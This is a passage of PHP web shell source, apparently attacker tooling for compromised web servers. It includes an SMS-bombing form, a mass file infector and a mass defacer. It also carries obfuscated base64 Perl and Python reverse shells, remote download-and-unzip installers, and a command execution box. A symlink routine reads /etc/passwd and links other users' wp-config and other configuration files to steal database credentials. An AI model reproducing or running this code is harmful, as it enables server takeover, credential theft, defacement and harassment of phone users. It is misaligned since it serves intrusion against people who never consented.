735<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
736<option value='@paging.acswireless.com'>Ameritech Paging</option>
737<option value='@pageapi.com'>Ameritech Paging</option>
738<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
739<option value='@text.aql.com'>Aql</option>
740<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
741<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
742<option value='@mobile.att.net'>AT&T</option>
743<option value='@txt.att.net'>AT&T2</option>
744<option value='@page.att.net'>AT&T Enterprise Paging</option>
745<option value='@mmode.com'>AT&T Free2Go</option>
746<option value='@mobile.att.net'>AT&T PCS</option>
747<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
748<option value='@sms.beemail.ru'>BeeLine GSM</option>
749<option value='@beepwear.net'>Beepwear</option>
750<option value='@message.bam.com'>Bell Atlantic</option>
751<option value='@bellmobility.ca'>Bell Canada</option>
752<option value='@txt.bellmobility.ca'>Bell Canada2</option>
753<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
754<option value='@bellsouth.cl'>Bell South</option>
755<option value='@blsdcs.net'>Bell South2</option>
756<option value='@sms.bellsouth.com'>Bell South3</option>
757<option value='@wireless.bellsouth.com'>Bell South4</option>
758<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
759<option value='@blsdcs.net'>Bell South Mobility</option>
760<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
761<option value='@blueskyfrog.com'>Blue Sky Frog</option>
762<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
763<option value='@myboostmobile.com'>Boost</option>
764<option value='@bplmobile.com'>BPL Mobile</option>
765<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
766<option value='@cmcpaging.com'>Carolina Mobile</option>
767<option value='@cwwsms.com'>Carolina West Wireless</option>
768<option value='@cell1.textmsg.com'>Cellular One</option>
769<option value='@cellularone.textmsg.com'>Cellular One2</option>
770<option value='@message.cellone-sf.com'>Cellular One3</option>
771<option value='@mobile.celloneusa.com'>Cellular One4</option>
772<option value='@sbcemail.com'>Cellular One5</option>
773<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
774<option value='@swmsg.com'>Cellular One (South West)</option>
775<option value='@mycellone.com'>Cellular One (West)</option>
776<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
777<option value='@csouth1.com'>Cellular South</option>
778<option value='@cwemail.com'>Centennial Wireless</option>
779<option value='@cvcpaging.com'>Central Vermont</option>
780<option value='@messaging.centurytel.net'>CenturyTel</option>
781<option value='@rpgmail.net'>Chennai RPG Cellular</option>
782<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
783<option value='@gocbw.com'>Cincinnati Bell</option>
784<option value='@cingularme.com'>Cingular</option>
785<option value='@mms.cingularme.com'>Cingular2</option>
786<option value='@mycingular.com'>Cingular3</option>
787<option value='@page.cingular.com'>Cingular5</option>
788<option value='@txt.att.net'>Cingular (Now AT&T)</option>
789<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
790<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
791<option value='@msg.clearnet.com'>Clearnet</option>
792<option value='@comcastpcs.textmsg.com'>Comcast</option>
793<option value='@comcel.com.co'>Comcel</option>
794<option value='@sms.comviq.se'>Comviq</option>
795<option value='@cookmail.com'>Cook Paging</option>
796<option value='@corrwireless.net'>Corr Wireless Communications</option>
797<option value='@sms.mycricket.com'>Cricket</option>
798<option value='@sms.ctimovil.com.ar'>CTI</option>
799<option value='@airtelmail.com'>Delhi Aritel</option>
800<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
801<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
802<option value='@mobile.dobson.net'>Dobson</option>
803<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
804<option value='@sms.edgewireless.com'>Edge Wireless</option>
805<option value='@sms.emt.ee'>EMT</option>
806<option value='@emtelworld.net'>Emtel (Mauritius)</option>
807<option value='@escotelmobile.com'>Escotel</option>
808<option value='@fido.ca'>Fido</option>
809<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
810<option value='@sendabeep.net'>Galaxy Corporation</option>
811<option value='@webpager.us'>GCS Paging</option>
812<option value='@msg.gci.net'>General Communications Inc.</option>
813<option value='@t-mobile-sms.de'>German T-Mobile</option>
814<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
815<option value='@bplmobile.com'>Goa BPLMobil</option>
816<option value='@sms.goldentele.com'>Golden Telecom</option>
817<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
818<option value='@celforce.com'>Gujarat Celforce</option>
819<option value='@messaging.sprintpcs.com'>Helio</option>
820<option value='@text.houstoncellular.net'>Houston Cellular</option>
821<option value='@ideacellular.net'>Idea Cellular</option>
822<option value='@ivctext.com'>Illinois Valley Cellular</option>
823<option value='@page.infopagesystems.com'>Infopage Systems</option>
824<option value='@inlandlink.com'>Inland Cellular Telephone</option>
825<option value='@msg.iridium.com'>Iridium (satellite)</option>
826<option value='@rek2.com.mx'>Iusacell</option>
827<option value='@jsmtel.com'>JSM Tele-Page</option>
828<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
829<option value='@mci.com'>MCI Phone</option>
830<option value='@sms.mymeteor.ie'>Meteor</option>
831<option value='@metropcs.sms.us'>Metro PCS</option>
832<option value='@clearlydigital.com'>Midwest Wireless</option>
833<option value='@mobilecomm.net'>Mobilcomm</option>
834<option value='@text.mtsmobility.com'>MTS</option>
835<option value='@sms.netcom.no'>Netcom</option>
836<option value='@messaging.nextel.com'>Nextel</option>
837<option value='@o2.co.uk'>O2</option>
838<option value='@o2imail.co.uk'>O2#2</option>
839<option value='@mmail.co.uk'>O2 (M-mail)</option>
840<option value='@orange.net'>Orange</option>
841<option value='@qwestmp.com'>Qwest</option>
842<option value='@pcs.rogers.com'>Rogers</option>
843<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
844<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
845<option value='@messaging.sprintpcs.com'>Sprint</option>
846<option value='@tms.suncom.com'>Sumcom</option>
847<option value='@tmomail.net'>T-Mobile</option>
848<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
849<option value='@t-d1-sms.de'>T-Mobile Germany</option>
850<option value='@txt.att.net'>Tracfone</option>
851<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
852<option value='@vtext.com'>Verizon</option>
853<option value='@vmobl.com'>Virgin Mobile</option>
854<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
855<option value='@vodafone.net'>Vodafone UK</option>
856</select>
857</td>
858</tr>
859<tr>
860<td>Amount Of Messages To Send:</td>
861<td><input type='text' name='numberof' size='10' class='text'></td>
862</tr>
863<tr>
864<td>From:</td>
865<td><input type='text' name='from' class='text'></td>
866</tr>
867<tr>
868<td>Subject:</td>
869<td><input type='text' size='85' class='text' name='subject'></td>
870</tr>
871</table>
872Message Content:<br>
873<textarea rows='20' cols='150' name='message_content' style='color:#00ff00'>
874</textarea><br>
875<input type='submit' name='do_bomb_sms' value='Bomb'><br>
876</form><br></font><br>";
877}
878?>
879<?php
880//Install MySQL Tool
881if (isset($_GET['installMySQL'])) {
882 echo "<center>
883<font size='4'>
884<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
885<br>
886<br>
887<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
888</font>
889</center>
890<br>";
891}
892//MSD 1 stuff
893if (isset($_GET['msd1'])) {
894 echo "<center>
895<font color='#14ab00' size='3'>
896Directory to install to:<br>
897If directory does not exist it will attempt to create it.
898<form action='' method='post'>
899<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
900<input type='submit' name='installmsd1' value='Install'>
901<form>
902</font>
903</center>
904<br>";
905}
906if (isset($_POST['installmsd1'])) {
907 $msd1dir = rtrim($_POST['msd1dir'], "/");
908 $msd1dir2 = "$msd1dir/msdv2.zip";
909 if (!is_dir($msd1dir)) {
910 if (!mkdir($msd1dir, 0777)) {
911 error("Failed to make directory $msd1dir");
912 }
913 }
914 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
915 if (file_put_contents($msd1dir2, $link)) {
916 unzip($msd1dir2, $msd1dir);
917 } else {
918 error("Could not write to $msd1dir");
919 }
920}
921//MSD 2 stuff
922if (isset($_GET['msd2'])) {
923 echo "<center>
924<font color='#14ab00' size='3'>
925Directory to install to:<br>
926If directory does not exist it will attempt to create it.
927<form action='' method='post'>
928<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
929<input type='submit' name='installmsd2' value='Install'>
930<form>
931</font>
932</center>
933<br>";
934}
935if (isset($_POST['installmsd2'])) {
936 $msd2dir = rtrim($_POST['msd2dir'], "/");
937 $msd2dir2 = "$msd2dir/msd.zip";
938 if (!is_dir($msd2dir)) {
939 if (!mkdir($msd2dir, 0777)) {
940 error("Failed to make directory $msd2dir");
941 }
942 }
943 $link = file_get_contents("http://p0wersurge.com/msd.zip");
944 if (file_put_contents($msd2dir2, $link)) {
945 unzip($msd2dir2, $msd2dir);
946 } else {
947 error("Could not write to $msd2dir");
948 }
949}
950?>
951<?php
952//Mass file infect
953if (isset($_POST['do_mass_infect'])) {
954 $masscode = " " . $_POST['massinfect_code'] . "\n";
955 $inf_dir = $_POST['infect_dir'];
956 $infcustom_dir = $_POST['cinfect_dir'];
957 $infcustom_dir = rtrim($infcustom_dir, "/");
958 $failed = 0;
959 $success = 0;
960 if (empty($masscode)) {
961 error("You must enter a code to infect files with!");
962 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
963 error("You must enter a custom directory when using the Custom option!");
964 } else {
965 if ($inf_dir == "root") {
966 $mddir = $rootdir;
967 }
968 if ($inf_dir == "custom") {
969 $mddir = $infcustom_dir;
970 }
971 foreach (files($mddir) as $key => $file) {
972 $file2 = trim($file, ".");
973 $getinf_file = file_get_contents($file2);
974 if ("$file2" == "$dir/$script2") {
975 echo "";
976 } else {
977 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
978 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
979 $success++;
980 } else {
981 echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
982 $failed++;
983 }
984 }
985 }
986 echo "<font color='#14ab00'><b>$success files successfully infected! ^_^<br>Failed to infect $failed files! :( </b></font><br>";
987 }
988}
989if (isset($_GET['massinfect'])) {
990 $example = "<?php system() ?>";
991 $example = htmlspecialchars($example);
992 $example2 = "<script>alert()</script>";
993 $example2 = htmlspecialchars($example2);
994 echo "<center>
995<font color='#14ab00'>
996<form action='' method='post'>
997Directory to start infect from:<br>
998<select name='infect_dir'>
999<option value='root'>Root</option>
1000<option value='custom'>Custom</option>
1001</select><br>
1002Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
1003This is great for infecting mass files with javascript scripts or php scripts<br>
1004It will append the code to the top of each file.<br>
1005Example:<br>
1006$example<br>
1007$example2<br>
1008Infect code:<br>
1009<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
1010</textarea><br>
1011This will not infect this shell.<br>
1012<input type='submit' name='do_mass_infect' value='Infect'><br>
1013</form>
1014</font>
1015</center>";
1016}
1017?>
1018<?php
1019//Mass Defacer
1020if (isset($_POST['do_mass_deface'])) {
1021 if (get_magic_quotes_gpc()) {
1022 $mass_source = stripslashes($_POST['massdeface_source']);
1023 } else {
1024 $mass_source = $_POST['massdeface_source'];
1025 }
1026 $def_dir = $_POST['deface_dir'];
1027 $custom_dir = $_POST['custom_dir'];
1028 $custom_dir = rtrim($custom_dir, "/");
1029 $failed = 0;
1030 $success = 0;
1031 if (empty($mass_source)) {
1032 error("You must enter a source!");
1033 } elseif (empty($custom_dir) && $def_dir == "custom") {
1034 error("You must enter a custom directory when using the Custom option!");
1035 } else {
1036 if ($def_dir == "root") {
1037 $mddir = $rootdir;
1038 }
1039 if ($def_dir == "custom") {
1040 $mddir = $custom_dir;
1041 }
1042 foreach (files($mddir) as $key => $file) {
1043 $file2 = trim($file, ".");
1044 if ("$file2" == "$dir/$script2") {
1045 echo "";
1046 } else {
1047 if (file_put_contents("$file2", $mass_source)) {
1048 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
1049 $success++;
1050 } else {
1051 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
1052 $failed++;
1053 }
1054 }
1055 }
1056 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
1057 }
1058}
1059if (isset($_GET['massdeface'])) {
1060 echo "<center>
1061<font color='#14ab00'>
1062<form action='' method='post'>
1063Directory to start deface from:<br>
1064<select name='deface_dir'>
1065<option value='root'>Root</option>
1066<option value='custom'>Custom</option>
1067</select><br>
1068Custom Directory: <input class='text' type='text' name='custom_dir' size=security'40'><br>
1069Source of deface:<br>
1070<textarea rows='20' cols='150' name='massdeface_source' style='color:#7FFF00'>
1071</textarea><br>
1072This will not deface this shell.<br>
1073<input type='submit' name='do_mass_deface' value='Deface'><br>
1074</form>
1075</font>
1076</center>";
1077}
1078?>
1079<?php
1080if(isset($_GET['perlbackconnect']))
1081{ ?>
1082<font size=2 face="comic sans ms" color=white>
1083<p><form method=POST action="">
1084Client ip:<input type=text name=ip value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
1085Connection Port:<input type=text name=port /><p>
1086<input type=submit name=sbm value="Connect" /></form>
1087</font>
1088<?php
1089
1090
1091if(isset($_POST['sbm']))
1092{
1093 $r=$_POST["ip"];
1094 $s=$_POST["port"];
1095 $p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';
1096
1097 $dec= gzinflate(base64_decode($p1));
1098 $fname = fopen('backconn.pl','w');
1099 fwrite($fname,$dec);
1100 $d="backconn.pl";
1101 $ch="chmod +x ".$d ;
1102 $permission= system($ch);
1103
1104 $z="perl ".$d." ".$r." ".$s;
1105 $run= system($z);
1106
1107 }
1108
1109}
1110?>
1111<?php
1112if(isset($_GET['pythonbackconnect']))
1113{
1114 ?>
1115<form method=POST>
1116Client ip:<input type=text name=pyt value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
1117port:<input type=text name=port /><p>
1118<input type=submit name=pyb value="Connect" /></form>
1119</font>
1120<?php
1121}
1122?>
1123<?php
1124if(isset($_POST['pyb']))
1125{
1126 $r=$_POST["pyt"];
1127 $s=$_POST["port"];
1128 $py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';
1129
1130 $dec= gzinflate(base64_decode($py));
1131 $fname = fopen('backconn.py','w');
1132 fwrite($fname,$dec);
1133 $d="backconn.py";
1134 $ch="chmod +x ".$d ;
1135 $permission= system($ch);
1136
1137 $z="python ".$d." ".$r." ".$s;
1138 $run= system($z);
1139
1140 }
1141?>
1142<?php
1143//echo out files
1144echo "<table border='1' width='100%' frame='void'>
1145<tr>
1146<th>
1147Current Directory: ";
1148$ex = explode("/", $dir);
1149for ($p = 0;$p < count($ex);$p++) {
1150 @$linkpath.= $ex[$p] . '/';
1151 $linkpath2 = rtrim($linkpath, "/");
1152 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1153}
1154echo "</th>
1155</tr>
1156</table>
1157<div id='hover'>
1158<table border='1' width='100%'>
1159<form action='' method='post' id='checkboxall'>
1160<tr>
1161<th>Directory/File Name</th>
1162<th>Owner/Group</th>
1163<th>Permissions</th>
1164<th>Writeable</th>
1165<th>Size</th>
1166<th>Last Modified</th>
1167<th>Delete</th>
1168<th>Rename</th>
1169<th>Mass</th>
1170</tr>
1171";
1172foreach ($direcs as $d) {
1173 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1174 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1175 if (is_array($downer)) {
1176 $downer = $downer['name'];
1177 }
1178 if (is_array($dgroup)) {
1179 $dgroup = $dgroup['name'];
1180 }
1181 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1182 $dwrite = is_writeable("$dir/$d") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1183 $dsize = "Directory";
1184 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1185 echo "<tr>
1186<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1187<td style='text-align: center;'>$downer/$dgroup</td>
1188<td style='text-align: center;'>$dperms</td>
1189<td style='text-align: center;'>$dwrite</td>
1190<td style='text-align: center;'>$dsize</td>
1191<td style='text-align: center;'>$dtime</td>
1192<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1193<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1194<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1195</tr>";
1196}
1197foreach ($files as $f) {
1198 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1199 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1200 if (is_array($fowner)) {
1201 $fowner = $fowner['name'];
1202 }
1203 if (is_array($fgroup)) {
1204 $fgroup = $fgroup['name'];
1205 }
1206 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1207 $fwrite = is_writeable("$dir/$f") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1208 $fsize = ByteConversion(filesize("$dir/$f"));
1209 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1210 $zip_file = explode(".", $f);
1211 $zip_file2 = end($zip_file);
1212 echo "<tr>";
1213 if ($zip_file2 == "zip") {
1214 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1215 } else {
1216 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1217 }
1218 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1219<td style='text-align: center;'>$fperms</td>
1220<td style='text-align: center;'>$fwrite</td>
1221<td style='text-align: center;'>$fsize</td>
1222<td style='text-align: center;'>$ftime</td>
1223<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1224<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1225<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1226</tr>";
1227}
1228echo "</table></div>";
1229echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1230<input type='button' onclick='checkall();' value='Select/Unselect All'>
1231<select name='mass_action'>
1232<option value='Delete'>Delete</option>
1233<option value='chmod'>chmod</option>
1234</select>
1235<input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
1236<input type='submit' name='mass_files'><br></div>";
1237echo "</form>";
1238closedir();
1239?>
1240<script type="text/javascript">/*<![CDATA[*/function removeValue(){document.getElementById("ch").value=""}checked=false;function checkall(a){var c=document.getElementById("checkboxall");if(checked==false){checked=true}else{checked=false}for(var b=0;b<c.elements.length;b++){c.elements[b].checked=checked}};/*]]>*/</script>
1241<?php
1242$wr = is_writeable($dir) ? "<font color='#00ff00'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1243echo "<table border='1' width='100%' frame='void'>
1244<tr>
1245<td>
1246<center>
1247Create directory:<br>
1248<form action='' method='post'>
1249<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1250<input type='submit' name='do_create_dir' value='Create'><br>
1251$wr
1252</form>
1253</center>
1254</td>
1255<td>
1256<center>
1257Create file:<br>
1258<form action='' method='post'>
1259<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1260<input type='submit' name='do_create_file' value='Create'><br>
1261$wr
1262</form>
1263</center>
1264</td>
1265</tr>
1266<tr>
1267<td>
1268<center>
1269Go to directory:<br>
1270<form action='' method='post'>
1271<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1272<input type='submit' name='do_go_dir' value='Go'><br>
1273</form>
1274</center>
1275</td>
1276<td>
1277<center>
1278Edit file:<br>
1279<form action='' method='post'>
1280<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1281<input type='submit' name='do_go_edit' value='Edit'><br>
1282</form>
1283</center>
1284</td>
1285</tr>
1286<tr>
1287<td>
1288<center>
1289<form action='' method='post' enctype='multipart/form-data'>
1290Upload to location:<br>
1291<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1292<input type='submit' value='Upload' name='do_upload_file'><br>
1293$wr
1294</form>
1295</center>
1296</td>
1297<td>
1298<center>
1299<form action='' method='post'>
1300wget file:<br>
1301<input type='text' name='wget_file' class='text' size='50' value='http://'>
1302<input type='submit' name='do_wget_file' value='wget'>
1303</form>
1304</center>
1305</td>
1306</tr>
1307<table border='1' frame='void' width='100%'>
1308<tr>
1309<td>
1310<center>
1311<form action='' method='post'>
1312Execute Command:<br>
1313<input type='text' class='text' name='exe_command' size='60'>
1314<input type='submit' name='do_exe_command' value='Execute'><br>
1315</form>
1316</center>
1317</td>
1318</tr>
1319</table>
1320<br><br><br>";
1321?>
1322<?php
1323//Salt generator
1324function gen_salt($length) {
1325 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
1326 $i = 0;
1327 $salt = "";
1328 while ($i < $length) {
1329 $arrand = array_rand($characters, 1);
1330 $salt.= $characters[$arrand];
1331 $i++;
1332 }
1333 return $salt;
1334}
1335?>
1336<h2><p>Symlink Killer ++</p></h2>
1337<form method=post><font color=white size=2 face="comic sans ms">Click this button to generate PHP.ini</font><p>
1338<input type=submit name=ini value="Generate PHP.ini" /></form>
1339<form method=post><font color=white size=2 face="comic sans ms">Click this button to extract usernames for Symlink</font><p>
1340<input type=submit name="usre" value="Extract usernames" /></form>
1341<?php
1342 if(isset($_POST['ini']))
1343 {
1344
1345 $r=fopen('php.ini','w');
1346 $rr=" disbale_functions=none ";
1347 fwrite($r,$rr);
1348 $link="<a href=php.ini><font color=red size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
1349 echo $link;
1350
1351 }
1352
1353
1354
1355 ?>
1356<?php
1357 error_reporting(0);
1358 echo "<font color=red size=2 face=\"comic sans ms\">";
1359 if(isset($_POST['su']))
1360 {
1361 mkdir('security',0777);
1362$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1363$g = fopen('security/.htaccess','w');
1364fwrite($g,$rr);
1365$security = symlink("/","security/root");
1366 $rt="<a href=security/root><font color=white size=3 face=\"comic sans ms\"> Success </font></a>";
1367 echo "Check link given below for / folder symlink <br><u>$rt</u>";
1368
1369 $dir=mkdir('SECURITY',0777);
1370 $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1371 $f = fopen('SECURITY/.htaccess','w');
1372
1373 fwrite($f,$r);
1374 $consym="<a href=SECURITY/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
1375 echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
1376
1377 $usr=explode("\n",$_POST['user']);
1378 $configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
1379 foreach($usr as $uss )
1380 {
1381 $us=trim($uss);
1382
1383 foreach($configuration as $c)
1384 {
1385 $rs="/home/".$us."/public_html/".$c;
1386 $r="SECURITY/".$us." .. ".$c;
1387 symlink($rs,$r);
1388
1389 }
1390
1391 }
1392
1393
1394 }
1395
1396
1397
1398 ?>
1399<?php
1400 if(isset($_POST['usre'])){
1401 ?><form method=post>
1402<textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
1403foreach($users as $user)
1404{
1405$str=explode(":",$user);
1406echo $str[0]."\n";
1407}
1408
1409?>
1410 </textarea><br><br>
1411<input type=submit name=su value="Start Extract" /></form>
1412<?php } ?>
1413<form method=post>
1414<font color=white size=2 face="comic sans ms">Click this button to open manual symlink form</font><p>
1415<input type=submit name=man value="Open Manual symlink form"/></form>
1416<?php
1417 if(isset($_POST['man']))
1418{
1419?>
1420<form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">  file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="Lets do it "></form>
1421<?php
1422}
1423 ?>
1424<?php
1425 error_reporting(0);
1426 if(isset($_POST['manual']))
1427 {
1428 $dlink=trim($_POST['dli']);
1429 $fna=trim($_POST['fna']);
1430 mkdir('SECURITY',0777);
1431 $acc = " Options all \n DirectoryIndex security.html \n Require None \n Satisfy Any";
1432$ha = fopen('SECURITY/.htaccess','w');
1433fwrite($ha,$acc);
1434$final="SECURITY/".$fna;
1435symlink($dlink,$final);
1436
1437echo "<br>File link for Symlink ".$dlink." link >>> <a href=".$final."><font color=red size=3>is here</font></a>";
1438}
1439 ?>
1440<form method=post>
1441<font color=white size=2 face="comic sans ms">Click this button for running Perl based symlink </font><p>
1442<input type=submit name=passx value="Eval"><p></form>
1443<?php
1444if(isset($_POST['passx']))
1445{
1446 ?>
1447<textarea style="background:black;color:white" rows=20 cols=50 name=usernames><?php $users=file("/etc/passwd");
